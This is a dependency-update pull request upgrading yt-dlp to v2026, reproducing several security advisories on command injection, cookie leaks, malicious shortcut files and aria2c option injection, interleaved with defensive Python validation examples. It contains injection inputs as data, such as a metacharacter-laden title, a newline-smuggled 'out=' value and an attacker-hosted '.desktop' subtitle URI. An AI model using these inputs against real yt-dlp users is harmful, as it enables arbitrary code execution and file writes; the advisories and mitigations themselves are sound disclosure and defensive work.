Update dependency yt-dlp to v2026 [SECURITY] #91
Open
renovate[bot] wants to merge 1 commit into
Codecov Report: All modified and coverable lines are covered by tests ✅

Coverage diff (master vs. #91):

| | master | #91 | +/- |
|---|---|---|---|
| Coverage | 85.71% | 88.39% | +2.67% |
| Files | 5 | 5 | |
| Lines | 112 | 112 | |
| Hits | 96 | 99 | +3 |
| Misses | 16 | 13 | -3 |

☔ View full report in Codecov by Sentry.
Force-pushed: 1e7df99 → 83a4b48 → 482b906 → 4ac12ca → ad366bf
This PR contains the following updates:

| Package | Update |
|---|---|
| yt-dlp | `^2024.0.0` → `^2026.0.0` |

yt-dlp: File system modification and RCE through improper file-extension sanitization
CVE-2024-38519 / GHSA-79w7-vh3h-8g4j
Summary
`yt-dlp` does not limit the extensions of downloaded files, which could lead to arbitrary filenames being created in the download folder (and path traversal on Windows). Since `yt-dlp` also reads config from the working directory (and on Windows executables will be executed from the yt-dlp directory), this could lead to arbitrary code being executed.

Patches

`yt-dlp` version 2024.07.01 fixes this issue by whitelisting the allowed extensions. This means some very uncommon extensions might not get downloaded; however, it will also limit the possible exploitation surface.
Workarounds
It is recommended to upgrade yt-dlp to version 2024.07.01 as soon as possible, always have `.%(ext)s` at the end of the output template, and make sure you trust the websites that you are downloading from. Also, make sure to never download to a directory within PATH or other sensitive locations like your user directory, `system32`, or other binaries locations.

For users not able to upgrade:

- Disable the generic extractor (`--ies default,-generic`)
- Always end the output template with `.%(ext)s` (e.g. `-o "%(title)s [%(id)s].%(ext)s"`)
- Avoid downloading subtitles (`--write-subs`, `--write-auto-subs`, `--all-subs`, `--write-srt`)
- Use `--ignore-config --config-location ...` to not load config from common locations

Details
One potential exploitation might look like this:

From a mimetype we do not know, we default to trimming the leading bit and using the remainder. Given a webpage that contains

this will try and download a file called `ffmpeg.exe` (`-o "%(title)s.%(ext)s"`). `ffmpeg.exe` will be searched for in the current directory, and so upon the next run arbitrary code can be executed.

Alternatively, when engineering a file called `yt-dlp.conf` to be created, the config file could contain `--exec ...` and so would also execute arbitrary code.

Acknowledgement
A big thanks to @JarLob for independently finding a new application of the same underlying issue.
More can be read on the dedicated GitHub Security Lab disclosure here: Path traversal saving subtitles (GHSL-2024-090)
Severity

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
yt-dlp has dependency on potentially malicious third-party code in Douyu extractors
GHSA-3v33-3wmw-3785
Impact
yt-dlp's DouyuTV and DouyuShow extractors used a `cdn.bootcdn.net` URL as a fallback for fetching a component of the crypto-js JavaScript library. When the Douyu extractor is used, yt-dlp extracts this JavaScript code and attempts to execute it externally using PhantomJS. `bootcdn.net` is owned by the bad actor responsible for the Polyfill JS supply chain attack that has been ongoing since at least June 2023. While there is no evidence that PhantomJS has been targeted by or is vulnerable to any attacks carried out by the Polyfill JS actor, there is the possibility that malicious JavaScript code may have been downloaded/cached by yt-dlp or executed by PhantomJS.

In order for this potential vulnerability to be exploited by any hypothetical attack, all 3 of the following conditions must be met:

- The user passes a `douyu.com` or `douyutv.com` URL to yt-dlp as input, or passes a URL that redirects to one of these domains.
- `cdnjs.cloudflare.com` is unavailable or blocked at the time of extraction, necessitating the usage of the `cdn.bootcdn.net` fallback; or it had been unavailable during a previous run of the Douyu extractor and JavaScript code from `cdn.bootcdn.net` had been cached to disk.

Patches
yt-dlp version 2024.07.07 fixes this issue by removing the URL pointing to the malicious CDN and by invalidating any Douyu extractor cache data created by unpatched versions of yt-dlp.
Workarounds
It is recommended to upgrade yt-dlp to version 2024.07.07 as soon as possible.
For users not able to upgrade:
- Disable the Douyu extractors (`--ies default,-douyutv,-douyushow`)

Acknowledgement
Thanks to @LeSuisse for reporting this promptly after `bootcdn.net` was discovered to be under control of the same bad actor behind the `polyfill.io` supply chain attack.
Severity
Low
yt-dlp: Arbitrary Command Injection when using the `--netrc-cmd` option
CVE-2026-26331 / GHSA-g3gw-q23r-pgqm
Summary
When yt-dlp's `--netrc-cmd` command-line option (or `netrc_cmd` Python API parameter) is used, an attacker could achieve arbitrary command injection on the user's system with a maliciously crafted URL.

Impact
yt-dlp maintainers assume the impact of this vulnerability to be high for anyone who uses `--netrc-cmd` in their command/configuration or `netrc_cmd` in their Python scripts. Even though the maliciously crafted URL itself will look very suspicious to many users, it would be trivial for a maliciously crafted webpage with an inconspicuous URL to covertly exploit this vulnerability via HTTP redirect. Users without `--netrc-cmd` in their arguments or `netrc_cmd` in their scripts are unaffected. No evidence has been found of this exploit being used in the wild.

Patches
yt-dlp version 2026.02.21 fixes this issue by validating all netrc "machine" values and raising an error upon unexpected input.
Workarounds
It is recommended to upgrade yt-dlp to version 2026.02.21 as soon as possible.
Users who are unable to upgrade should avoid using the `--netrc-cmd` command-line option (or `netrc_cmd` Python API parameter), or they should at least not pass a placeholder (`{}`) in their `--netrc-cmd` argument.

Details
yt-dlp's `--netrc-cmd` option can be used to run any arbitrary shell command to retrieve site login credentials so that the user doesn't have to store the credentials as plaintext in the filesystem. The `--netrc-cmd` argument is a shell command with an optional placeholder (`{}`). If the placeholder is present in the argument, it is replaced with the netrc "machine" value, which specifies the site for which login credentials are needed.

The netrc "machine" value is usually explicitly defined in yt-dlp's extractor code for a given site. However, yt-dlp has four extractors where the netrc "machine" value needs to be dynamically sourced from the site's hostname. And in three of those extractors (`GetCourseRuIE`, `TeachableIE` and `TeachableCourseIE`), wildcard matches are allowed for one or more subdomains of the hostname. This can result in a netrc "machine" value that contains special shell characters.

The `--netrc-cmd` argument is executed by a modified version of Python's `subprocess.Popen` with `shell=True`, which means that any special characters may be interpreted by the host shell, potentially leading to arbitrary command injection.

Here is an example of maliciously crafted URL input that exploits the vulnerability:

Although only 3 of yt-dlp's extractors are directly susceptible to this attack, yt-dlp's "generic" extractor will follow HTTP redirects and try to match the resulting URL with one of the dedicated extractors. This means that any URL processed by the generic extractor could ultimately lead to a maliciously crafted URL that is matched by one of the vulnerable extractors. Hypothetically, an attacker could create a website with an inconspicuous URL and legitimate-looking media content that would serve an HTTP redirect to a maliciously crafted URL when it detects a request from yt-dlp.
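The patch description above says the fix validates netrc "machine" values and raises on unexpected input. The following Python example, added here and not yt-dlp's own code, shows what that check looks like in practice: `validate_netrc_machine` accepts only a plain hostname, and `build_netrc_cmd` additionally shell-quotes the value before substituting it for the `{}` placeholder, so even a wildcard-derived hostname reaches the shell as a single literal argument. The hostname regex, the function names and the `pass show {}` template in the usage lines are assumptions made for this example.

```python
import re
import shlex
import subprocess

# Hostname grammar used for the check: dot-separated labels of letters, digits
# and hyphens, no label starting or ending with a hyphen. This regex is an
# assumption for the example, not the validation yt-dlp itself ships.
_LABEL = r'(?!-)[A-Za-z0-9-]{1,63}(?<!-)'
_HOSTNAME_RE = re.compile(rf'{_LABEL}(?:\.{_LABEL})*')


def validate_netrc_machine(machine: str) -> str:
    """Return `machine` unchanged if it is a plain hostname, else raise ValueError.

    A machine value derived from an attacker-influenced hostname (wildcard
    subdomains) must never carry shell metacharacters such as ; $ ( ) ` | or
    whitespace. fullmatch (not match) is used so a trailing newline also fails.
    """
    if not machine or len(machine) > 253 or not _HOSTNAME_RE.fullmatch(machine):
        raise ValueError(f'unexpected netrc machine value: {machine!r}')
    return machine


def build_netrc_cmd(template: str, machine: str) -> str:
    """Substitute the {} placeholder with a validated and shell-quoted machine value."""
    machine = validate_netrc_machine(machine)
    # shlex.quote is a second layer: even if the validation were loosened later,
    # the value would still be one literal word to the shell.
    return template.replace('{}', shlex.quote(machine))


def run_netrc_cmd(template: str, machine: str, timeout: float = 10) -> str:
    """Run the credential command the way the page describes (shell=True) and return its stdout."""
    cmd = build_netrc_cmd(template, machine)
    completed = subprocess.run(cmd, shell=True, capture_output=True, text=True,
                               check=True, timeout=timeout)
    return completed.stdout


if __name__ == '__main__':
    # Constructed values: a benign hostname and one carrying shell metacharacters.
    print(build_netrc_cmd('pass show {}', 'teachable.com'))
    try:
        build_netrc_cmd('pass show {}', 'teachable.com; id')
    except ValueError as exc:
        print('rejected:', exc)
```

The validation rejects the value outright rather than trying to escape it, which matches the "raise an error upon unexpected input" behaviour the patch describes; the quoting in `build_netrc_cmd` is defence in depth for the case where a future extractor loosens what counts as a hostname.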
Severity

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
yt-dlp: File Downloader cookie leak with curl
CVE-2026-50019 / GHSA-f7j3-774f-rfhj
Summary
If curl is used as an external downloader for yt-dlp, cookies may be leaked to an unintended host upon HTTP redirect or when the host for download fragments differs from their parent manifest's.
This is the equivalent to GHSA-v8mc-9377-rwjj for the `curl` downloader. The vulnerable behavior is present in yt-dlp released since 2023.09.24.

Details
At the file download stage, the cookies are passed by yt-dlp to the file downloader via `--cookie`. However, unless these are loaded from a file, this operation does not activate the cookie engine. As a result, `curl` will send cookies with requests to domains or paths for which the cookies are not scoped.

An example of a potential attack scenario exploiting this vulnerability:

- `curl` forwards the user's sensitive cookie information.

Patches

yt-dlp version 2026.06.09 fixes this issue by doing the following:

- Passing `--cookie -` if `curl` is version 7.59 or higher.
- Passing `--cookie /dev/fd/0` if the system supports this device file.
- Passing `--cookie <file>`.

Workarounds
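The distinction the advisory draws is between a literal `--cookie name=value` string, which curl replays to every host without scoping, and cookies loaded through the cookie engine, which are matched against domain, path and scheme per request. The following Python example is added here and is not yt-dlp's or curl's code; it uses the standard library cookie jar as a stand-in for a scope-aware cookie engine to show which cookies an in-scope client would actually send, and builds both the unsafe and the file-based curl argument lists side by side. The function names, the `video.example.invalid` / `cdn.example.invalid` hosts and the `session=abc123` cookie are constructed for the example.

```python
import os
import tempfile
from http.cookiejar import Cookie, CookieJar, MozillaCookieJar
from urllib.request import Request


def make_cookie(name, value, domain, path='/', secure=True):
    """Build a version-0 (Netscape-style) cookie scoped to `domain`, `path` and, if secure, https."""
    return Cookie(version=0, name=name, value=value, port=None, port_specified=False,
                  domain=domain, domain_specified=True,
                  domain_initial_dot=domain.startswith('.'),
                  path=path, path_specified=True, secure=secure, expires=None,
                  discard=True, comment=None, comment_url=None, rest={}, rfc2109=False)


def cookies_for_url(jar, url):
    """Cookie header a scope-aware client (here, the stdlib jar) would send to `url`.

    Returns '' when no cookie in the jar is in scope for the host, path or scheme."""
    req = Request(url)
    jar.add_cookie_header(req)
    return req.get_header('Cookie') or ''


def curl_cookie_args_unsafe(jar, url):
    """The pre-fix pattern from the advisory: the cookies for `url` are flattened into a
    literal `--cookie name=value` string. curl's cookie engine stays off, so this exact
    header is replayed to every host curl talks to afterwards, including a redirect target."""
    return ['curl', '--cookie', cookies_for_url(jar, url), url]


def curl_cookie_args_safe(jar, url, cookie_file=None):
    """Hand curl a cookie *file* (Netscape format) instead, so its cookie engine applies
    the stored domain/path/secure scope per request. Creates a temp file if none is given."""
    if cookie_file is None:
        fd, cookie_file = tempfile.mkstemp(prefix='cookies-', suffix='.txt')
        os.close(fd)
    mozjar = MozillaCookieJar(cookie_file)
    for cookie in jar:
        mozjar.set_cookie(cookie)
    mozjar.save(ignore_discard=True)  # session cookies are discard=True; keep them
    return ['curl', '--cookie', cookie_file, url]


if __name__ == '__main__':
    # Constructed sample: a session cookie for the site that served the manifest.
    jar = CookieJar()
    jar.set_cookie(make_cookie('session', 'abc123', 'video.example.invalid'))
    print(cookies_for_url(jar, 'https://video.example.invalid/frag1.ts'))        # in scope
    print(repr(cookies_for_url(jar, 'https://cdn.example.invalid/frag1.ts')))   # '' for another host
    print(curl_cookie_args_unsafe(jar, 'https://video.example.invalid/frag1.ts'))
    print(curl_cookie_args_safe(jar, 'https://video.example.invalid/frag1.ts'))
```

curl decides between "cookie string" and "cookie file" by whether the `--cookie` argument contains `=`, which is why the file-based form activates the engine and the flattened header does not; the `--cookie -` and `/dev/fd/0` variants in the patch list feed that same file format through stdin instead of a path on disk.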
It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.
For users who are not able to upgrade:
- Do not use `--downloader curl`.

Severity

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N
yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)
CVE-2026-50023 / GHSA-c6mh-fpjc-4pr3
Summary
A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as `.desktop`, `.url`, `.webloc`) to the user's filesystem, bypassing the remediation for CVE-2024-38519.

Details

The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as `.exe` or `.sh`) during file downloads. However, this allowlist explicitly included the unsafe extensions `.desktop`, `.url`, and `.webloc` so that the functionality of the `--write-link` option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.

Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an `EXT-X-MEDIA:TYPE=SUBTITLES` tag with a malicious URI (e.g., `URI="http://attacker/x.desktop"`), which would result in yt-dlp writing the attacker-controlled content to a file with a `.desktop` extension if the user had passed the `--write-subs` option.

Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments. While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.
Proof of Concept

1. Start a malicious server:

Host a malicious `master.m3u8` manifest that points to malicious subtitle payloads, and host the `payload.desktop` file with malicious content.

2. Trigger the download:

In this case, the generic extractor triggers the exploit if the `--write-subs` option is used.

Result: yt-dlp writes `MyVideo.en.desktop` to disk, containing the attacker payload.

Patches

yt-dlp version 2026.06.09 fixes this issue by removing `.url`, `.desktop` and `.webloc` from the global file extension allowlist, and by only allowing those file types to be written from within the context of the `--write-link` options' functionality.
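Both this advisory and CVE-2024-38519 above come down to the same control: the extension of a file derived from remote data must be checked against an allowlist, and the shortcut extensions must be allowed only when the caller is deliberately writing a link file. The Python example below is added here and is not yt-dlp's code; it is a small model of that rule with a context parameter, plus the URL-to-extension step that the m3u8 subtitle case goes through, so the `x.desktop` URI from the advisory is rejected on the subtitle path but a `--write-link` caller can still write `.desktop`. The allowlists, function names and the `example.invalid` URLs are assumptions for the example (yt-dlp's real allowlist is longer).

```python
import os
import re
from urllib.parse import urlsplit

# Constructed allowlist for the example; yt-dlp's real list is longer.
MEDIA_EXTENSIONS = frozenset({
    'mp4', 'mkv', 'webm', 'm4a', 'mp3', 'opus', 'aac', 'flac', 'ogg', 'wav',
    'vtt', 'srt', 'ass', 'ttml', 'jpg', 'jpeg', 'png', 'webp', 'json', 'description',
})
# Shortcut types: the CVE-2024-38519 fix kept these on the global allowlist for
# --write-link; the 2026.06.09 fix confines them to that context instead.
LINK_EXTENSIONS = frozenset({'url', 'desktop', 'webloc'})


def sanitize_extension(ext, context='download'):
    """Return a normalised extension if it is allowed in `context`, else raise ValueError.

    context is 'download' (media, subtitles, thumbnails) or 'write-link'."""
    ext = ext.lstrip('.').lower()
    # No separators, dots, NULs or other surprises: this also kills path traversal.
    if not re.fullmatch(r'[a-z0-9]{1,16}', ext):
        raise ValueError(f'malformed extension: {ext!r}')
    if ext in MEDIA_EXTENSIONS:
        return ext
    if context == 'write-link' and ext in LINK_EXTENSIONS:
        return ext
    raise ValueError(f'extension {ext!r} is not allowed in context {context!r}')


def extension_from_url(url):
    """Extension an extractor would naively derive from a (possibly attacker-supplied) URI."""
    return os.path.splitext(urlsplit(url).path)[1].lstrip('.')


def subtitle_filename(title, lang, ext, context='download'):
    """Build '<title>.<lang>.<ext>' for the download folder, validating every remote part."""
    ext = sanitize_extension(ext, context)
    stem = re.sub(r'[\\/:\x00-\x1f]', '_', title)  # keep the file inside the download folder
    if not re.fullmatch(r'[a-z]{2,3}(-[A-Za-z0-9]+)?', lang):
        raise ValueError(f'unexpected subtitle language tag: {lang!r}')
    return f'{stem}.{lang}.{ext}'


if __name__ == '__main__':
    # Constructed URIs standing in for EXT-X-MEDIA subtitle entries.
    for uri in ('https://example.invalid/subs/en.vtt', 'http://example.invalid/x.desktop'):
        try:
            print(subtitle_filename('MyVideo', 'en', extension_from_url(uri)))
        except ValueError as exc:
            print('rejected:', exc)
    print(subtitle_filename('MyVideo', 'en', 'desktop', context='write-link'))
```

The point of the `context` argument is that the allowlist alone is not the fix: the 2024 fix had a correct allowlist and still allowed shortcut files because the same list served every code path. Tying the exception to the one caller that needs it is what closes the bypass.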
It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.
Users who are not able to upgrade should do ALL of the following:
- Do not use the `--write-subs`, `--write-auto-subs`, `--embed-subs`, `--write-thumbnail`, `--write-all-thumbnails`, or `--embed-thumbnail` options
- Use `--format -` to interactively select download formats and validate their file extensions

Severity

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
yt-dlp: Arbitrary code execution via manifest downloads with aria2c
CVE-2026-50574 / GHSA-vx4q-3cr2-7cg2
Summary
If aria2c is used as an external downloader for a fragmented manifest format (such as an HLS/DASH stream), yt-dlp passes insufficiently sanitized input to aria2c that allows an attacker to perform an arbitrary file write. On Windows platforms, this can lead to immediate arbitrary code execution. On non-Windows platforms, this can lead to arbitrary code execution upon the next invocation of yt-dlp.
Details
When downloading a fragmented manifest format such as an HLS or DASH stream, yt-dlp first extracts a list of all fragment URLs from the stream's manifest. If the user has selected aria2c as an external downloader, yt-dlp then constructs an input file for aria2c from the fragment URL list and passes its filepath as the argument to aria2c's `-i` option.

aria2c's `-i` (or `--input-file`) option allows for downloading a list of URIs from the given text file. The text file must be formatted as a list of URIs separated by newlines. aria2c's format permits configuration lines for each URI, which can contain command-line options to be given to aria2c. These optional lines follow each URI line and are signified only by leading whitespace. yt-dlp constructs the input file with these optional lines so that it's able to specify the output filename for each fragment using the `out=` option.

yt-dlp's utilization of the aria2c input file format presents two known attack vectors:

- An attacker can craft a malicious DASH manifest with one or more fragment URLs that contain `&#10;`, which is the HTML escape sequence for a newline. yt-dlp interprets this escape sequence as an actual newline character when writing the fragment URLs to the aria2c input file, which allows for an attacker to inject arbitrary aria2c options into the input file. With option injection, the attacker can achieve arbitrary file writes. This attack vector is possible only via downloads of DASH formats, since their manifests are an XML format which necessitates unescaping of HTML special characters.
- An attacker can craft a malicious metadata response where the data parsed by yt-dlp as the `title` field (or any other metadata field that the user includes in their output template) contains strategically placed newlines and magnet URIs. If the user has passed the `--no-windows-filename` option to disable sanitization of newlines in output filenames, the attacker is able to achieve arbitrary file writes by injecting arbitrary URIs and options into the aria2c input file. This attack vector is possible via downloads of both HLS and DASH formats.

On Windows, attacker-controlled file writes can lead to immediate arbitrary code execution: the attacker could write a malicious executable file named `ffmpeg.exe` to the current working directory, and it could be invoked during the postprocessing stage if the user's `yt-dlp.exe` also resides in the current working directory.

On all platforms, attacker-controlled file writes can lead to arbitrary code execution on repeat invocations of yt-dlp: the attacker could write a yt-dlp configuration file (`yt-dlp.conf`) to the current working directory containing a malicious `--exec` argument.

Patches
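The root cause described above is a line-oriented text format (one URI per line, option lines marked only by leading whitespace) being populated with values that may themselves contain newlines or whitespace. yt-dlp's fix removed aria2c support for fragmented formats altogether; the Python example below, added here and not yt-dlp's or aria2c's code, shows the validation a defender would put in front of such a format if it had to stay: every fragment URL is unescaped first (the DASH/XML step that turns `&#10;` into a newline) and then rejected if it contains any whitespace or a non-HTTP scheme, and every `out=` name is restricted to a plain filename. The function names, the scheme allowlist and the `cdn.example.invalid` URLs are assumptions for the example.

```python
import html
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = frozenset({'http', 'https'})
# Plain filenames only: no separators, so out= cannot escape the fragment directory.
_OUT_NAME_RE = re.compile(r'[A-Za-z0-9._-]{1,128}')


def validate_fragment_url(url):
    """Return `url` if it is safe to place on its own line of an aria2c input file."""
    # Any whitespace (including the newline produced by unescaping &#10;) would start
    # a new line, i.e. a new URI or an injected option line.
    if not url or any(ch.isspace() for ch in url):
        raise ValueError(f'fragment URL contains whitespace: {url!r}')
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:  # rejects magnet:, file: and friends
        raise ValueError(f'fragment URL scheme not allowed: {scheme!r}')
    return url


def validate_out_name(name):
    """Return `name` if it is a plain filename usable as an aria2c out= value."""
    if name in ('.', '..') or not _OUT_NAME_RE.fullmatch(name):
        raise ValueError(f'unsafe out= name: {name!r}')
    return name


def dash_fragment_url(raw_xml_value):
    """DASH manifests are XML: the attribute value is HTML-unescaped first, exactly the
    step that turns &#10; into a real newline, and only then validated."""
    return validate_fragment_url(html.unescape(raw_xml_value))


def build_aria2c_input(fragments):
    """fragments: iterable of (url, out_name) pairs. Returns the text of an -i input file,
    one URI line followed by one indented option line per fragment."""
    lines = []
    for url, out_name in fragments:
        lines.append(validate_fragment_url(url))
        lines.append(f' out={validate_out_name(out_name)}')  # leading space = option line
    return '\n'.join(lines) + '\n'


if __name__ == '__main__':
    # Constructed fragment list as an extractor might produce it.
    print(build_aria2c_input([
        ('https://cdn.example.invalid/seg-1.m4s', 'frag-1.m4s'),
        ('https://cdn.example.invalid/seg-2.m4s', 'frag-2.m4s'),
    ]))
    # Constructed raw XML attribute carrying an encoded newline and an option line.
    try:
        dash_fragment_url('https://cdn.example.invalid/seg.m4s&#10; out=../../evil')
    except ValueError as exc:
        print('rejected:', exc)
```

Validating after unescaping matters: a check on the raw XML string would see `&#10;` as six harmless characters and pass it, and the newline would only appear once the value was written to the file.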
yt-dlp version 2026.06.09 fixes this issue by removing support for downloading fragmented manifest formats with aria2c.
Workarounds
It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.
For users who are not able to upgrade:
- Add `--downloader dash,m3u8:native` to your yt-dlp command.

Severity

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
yt-dlp: Arbitrary command injection possible if --exec option used with yt-dlp
GHSA-69qj-pvh9-c5wg
Summary
yt-dlp's `--exec` option is vulnerable to arbitrary command injection when handling untrusted metadata if the argument uses standard string formatting (e.g. `%(title)s`) or other unsafe conversions. An attacker could achieve remote code execution on the user's machine via maliciously crafted metadata containing quotes or other special shell characters.

Details
Since yt-dlp version 2021.04.11, the `--exec` option has supported "output template syntax", which is a superset of Python's `printf`-style string formatting also used by the `--output` option. This means the user is able to pass a "command template" as an argument to the `--exec` option which will be executed by the user's shell. The command template allows for the downloaded video's metadata to be interpolated into the command string.

yt-dlp implements a `%()q` conversion, which will shell-quote/escape any metadata value such that it is safe to be interpolated into a command string. However, there are unsafe conversions such as `%()s` which result in the command template being formatted with the raw metadata string. These unsafe conversions do not perform any sanitization or escaping for shell contexts. If one or more of these unsafe conversions is used in the command template, an attacker can craft a malicious metadata value containing shell operators (e.g. `;`, `&`, `|`) to break out of the intended command and execute payload commands.

Impact
The impact is limited to users who pass an `--exec` command template containing unsafe conversions in their yt-dlp command or configuration file: `%()s`, `%()a`, `%()r`, `%()j`, `%()S` (including any of their flagged variants.)

Patches
yt-dlp version 2026.06.09 fixes this issue by restricting the conversions that can be used in an `--exec` command template to those known to be safe: `%()d`, `%()i`, `%()f`, `%()q` (including any of their flagged variants.) It also restricts the characters that can be used in command template defaults and placeholders when the user passes an `--exec` argument containing output template syntax.

Workarounds
This vulnerability can be fully mitigated by doing any of the following:
- Use only safe conversions (`%()d`, `%()i`, `%()f`, `%()q`) in any `--exec` command templates
- Remove `--exec` arguments from your command and configuration files
- Do not use the `--exec` option

Proof-of-Concept

The title `video; touch pwned.txt #` combined with an unsafe `--exec` flag.

Reproduction steps (simulated): run `python3 poc.py`; `PWNED.txt` will be created, proving arbitrary command execution.
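The patch restricts `--exec` templates to the conversions that cannot smuggle shell syntax, and the first workaround asks users to do the same by hand. The Python example below is added here and is not yt-dlp's code: a small renderer that implements only those safe conversions (`q` via `shlex.quote`, `d`/`i`/`f` as numbers) and refuses any other, together with a linter that reports unsafe conversions in an existing template so a configuration file can be audited before upgrading. The field regex is a simplification of yt-dlp's output template grammar (no width, precision or default clauses), and the `notify-send` template and the `info` dictionary are constructed for the example.

```python
import re
import shlex

# Per the patch description: these are the conversions allowed in an --exec template.
SAFE_CONVERSIONS = frozenset('difq')
# Simplified field syntax: %(field)[flags]conv. yt-dlp's grammar also has width,
# precision and default clauses, which are omitted here.
FIELD_RE = re.compile(r'%\((?P<field>[A-Za-z_][\w.]*)\)(?P<flags>[-+ #0]*)(?P<conv>[A-Za-z])')


def unsafe_conversions(template):
    """List (field, conversion) pairs in `template` whose conversion is not shell-safe."""
    return [(m['field'], m['conv']) for m in FIELD_RE.finditer(template)
            if m['conv'] not in SAFE_CONVERSIONS]


def render_exec_template(template, info):
    """Interpolate metadata into an --exec template using safe conversions only.

    Raises ValueError on the first unsafe conversion instead of emitting raw metadata,
    mirroring the post-fix behaviour described above."""
    def substitute(match):
        field, conv = match['field'], match['conv']
        if conv not in SAFE_CONVERSIONS:
            raise ValueError(f'unsafe conversion %({field}){conv} in --exec template')
        value = info[field]
        if conv == 'q':
            return shlex.quote(str(value))  # one literal shell word, whatever the metadata says
        if conv in 'di':
            return str(int(value))
        return format(float(value), 'f')
    return FIELD_RE.sub(substitute, template)


if __name__ == '__main__':
    # Constructed metadata using the advisory's proof-of-concept title.
    info = {'title': 'video; touch pwned.txt #', 'id': 'abc123', 'duration': 12.9}
    print(unsafe_conversions('notify-send %(title)s %(id)q'))        # [('title', 's')]
    print(render_exec_template('notify-send %(title)q', info))       # quoted as one word
    try:
        render_exec_template('notify-send %(title)s', info)
    except ValueError as exc:
        print('rejected:', exc)
```

Running `unsafe_conversions` over the `--exec` lines of a config file is the quickest way to find the templates the Impact section warns about, since a `%(title)s` that has worked for years looks identical to a safe one until a hostile title arrives.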
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Release Notes
yt-dlp/yt-dlp (yt-dlp)
- v2026.6.9 (Compare Source)
- v2026.3.17 (Compare Source)
- v2026.3.13 (Compare Source)
- v2026.3.3 (Compare Source)
- v2026.2.21 (Compare Source)
- v2026.2.4 (Compare Source)
- v2026.1.31 (Compare Source)
- v2026.1.29 (Compare Source)
- v2025.12.8 (Compare Source)
- v2025.11.12 (Compare Source)

Important changes

yt-dlp now requires users to have an external JavaScript runtime (e.g. Deno) installed in order to solve the JavaScript challenges presented by YouTube. Read more

Core changes

- `--cookies-from-browser` for Safari on iOS (#14950) by pha1n0q
- `hook` category (#14845) by seproDev

Extractor changes

- `tv_downgraded` client (#14887) by seproDev (With fixes in fa35eb2)
- `web_embedded` client extraction (#14843) by bashonly, seproDev

Downloader changes

- `ffmpeg_args` for each format (#14886) by bashonly

Networking changes

Misc. changes

- `install_deps` script (#14766) by bashonly

- v2025.10.22 (Compare Source)

Important changes

Some formats may still be unavailable, especially if cookies are passed to yt-dlp. The NEXT release, expected very soon, will require an external JS runtime (e.g. Deno) in order for YouTube downloads to work properly. Read more

Python 3.9 has reached its end-of-life as of October 2025, and yt-dlp has now removed support for it. Read more

Core changes

Extractor changes

Misc. changes

- v2025.10.14 (Compare Source)

Core changes

- `prefer-vp9-sort` compat option (#14603) by seproDev

Extractor changes

- v2025.9.26 (Compare Source)
- v2025.9.23 (Compare Source)
- v2025.9.5 (Compare Source)
- v2025.8.27 (Compare Source)
- [v2025.8.22](https://redirect.gi

Configuration
📅 Schedule: (UTC)
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.